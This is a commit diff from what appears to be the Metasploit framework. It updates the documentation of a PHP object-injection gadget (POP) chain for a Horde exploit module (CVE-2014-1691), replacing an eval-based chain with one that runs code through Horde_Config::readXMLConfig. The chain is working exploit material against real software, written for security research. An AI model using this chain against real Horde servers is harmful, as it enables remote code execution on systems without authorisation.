Update POP chain documentation

Author: jvazquez-r7

modules/exploits/unix/webapp/horde_unserialize_exec.rb

@@ -94,56 +94,51 @@ def send_request_exploit(p)
 end
 
 =begin
+
 PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
 
-$phpcode = '"&&eval("phpinfo();die;")=="';
- 
-class Horde_Date_Parser_Token
+class Horde_Config
 {
-   public $tags = array('A');
+   protected $_oldConfig = "phpinfo();die;";
 }
- 
+
 class Horde_Prefs_Scope
 {
-   protected $_prefs;
- 
-   function __construct()
-   {
-      $this->_prefs = array($GLOBALS['phpcode'] => 1);
-   }
+   protected $_prefs = array(1);
 }
- 
+
 class Horde_Prefs
 {
-   protected $_opts, $_scopes;
- 
-   function __construct()
-   {
-      $this->_opts['sizecallback'] = array(new Horde_Date_Parser_Token, 'untag');
-      $this->_scopes['horde'] = new Horde_Prefs_Scope;
-   }
+   protected $_opts, $_scopes;
+
+   function __construct()
+   {
+      $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
+      $this->_scopes['horde'] = new Horde_Prefs_Scope;
+   }
 }
- 
+
 class Horde_Prefs_Identity
 {
-   protected $_prefs, $_prefnames;
- 
-   function __construct()
-   {
-      $this->_prefs = new Horde_Prefs;
-      $this->_prefnames['identities'] = $GLOBALS['phpcode'];
-   }
+   protected $_prefs, $_prefnames;
+
+   function __construct()
+   {
+      $this->_prefs = new Horde_Prefs;
+      $this->_prefnames['identities'] = 0;
+   }
 }
- 
+
 class Horde_Kolab_Server_Decorator_Clean
 {
-   private $_server, $_added = array(1);
- 
-   function __construct()
-   {
-      $this->_server = new Horde_Prefs_Identity;
-   }
+   private $_server, $_added = array(1);
+
+   function __construct()
+   {
+      $this->_server = new Horde_Prefs_Identity;
+   }
 }
-  
+
 $popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
+
 =end